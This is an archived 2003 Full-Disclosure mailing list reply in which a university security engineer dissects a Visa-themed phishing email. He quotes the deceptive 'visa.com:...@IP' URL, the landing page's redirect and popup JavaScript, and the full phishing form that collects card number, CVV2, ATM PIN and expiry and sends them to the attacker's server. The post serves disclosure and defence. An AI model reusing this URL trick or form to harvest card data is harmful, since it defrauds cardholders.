[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] visa XSS?

To: Mauro Flores <almauri@cs.com.uy>
Subject: Re: [Full-Disclosure] visa XSS?
From: Gary Flynn <flynngn@jmu.edu>
Date: Tue, 23 Dec 2003 09:29:53 -0500

Mauro Flores wrote:

I receive this mail today, the funny stuff is that when you click on the
link, you execute:
http://www.visa.com:UserSession=2f6q9uuu88312264trzzz55884495&useroption=SecurityUpdate&StateLevel=GetFrom@64.21.80.2/~gotier/verified_by_visa.htm

I don't have a Visa card and I don't like that 64.21.80.2 which is not a
Visa IP, AFAIK.
Anyone else receive it??


Yeah. We just got one here. I missed the first part of this thread
so I don't know if I'm repeating stuff.

The original email came from an address registered in Korea.

Although the present web site redirects to the VISA site, if you look at
the source you'll find:

<HTML><HEAD> <TITLE>Secure with Visa</TITLE> <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> <meta http-equiv='refresh' content='0; url=http://www.usa.visa.com/personal/privacy_policy/?it=ft_/personal/secure_with_visa/index.html'> <BODY> <script language="JavaScript"> <!--


//  alert("popali");
        window.name="spec";
        window.open("http://64.21.80.2/~gotier/r.php";, 'Visa', 
"resizable=no,scrollbars=no,width=425,height=198");  
//      window.focus();
//-->
</script>
</BODY></HTML>

And that r.php is a phish:

Please, enter your data info!<html>
<head>
<title>Enter your data</title>
</head>
<body>
<br>
<form method=post action=http://64.21.80.2/~gotier/r.php>
Credit Card No. <input type=text name=cc value=''><br>
CVV2 <input type=text name=cvv2 value=''><br>
PIN-ATM CODE: <input type=text name=pin value=''><br>
Expiration Date: month : <select name=month>
<option value=01>01
<option value=02>02
<option value=03>03
<option value=04>04
<option value=05>05
<option value=06>06
<option value=07>07
<option value=08>08
<option value=09>09
<option value=10>10
<option value=11>11
<option value=12>12
</select> year : <select name=year>
<option value=2003>2003
<option value=2004>2004
<option value=2005>2005
<option value=2006>2006
<option value=2007>2007
<option value=2008>2008
<option value=2009>2009
<option value=2010>2010
<option value=2011>2011
<option value=2012>2012
</select>
<br><br>
<input type=submit value='Send');
</form>
</body>
</html>

--
Gary Flynn
Security Engineer - Technical Services
James Madison University


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- [Full-Disclosure] visa XSS?
  - From: Mauro Flores <almauri@cs.com.uy>

Prev by Date: RE: [Full-Disclosure] visa XSS?
Next by Date: RE: [Full-Disclosure] visa XSS?
Previous by thread: Re: [Full-Disclosure] visa XSS?
Next by thread: RE: [Full-Disclosure] visa XSS?
Index(es):
- Date
- Thread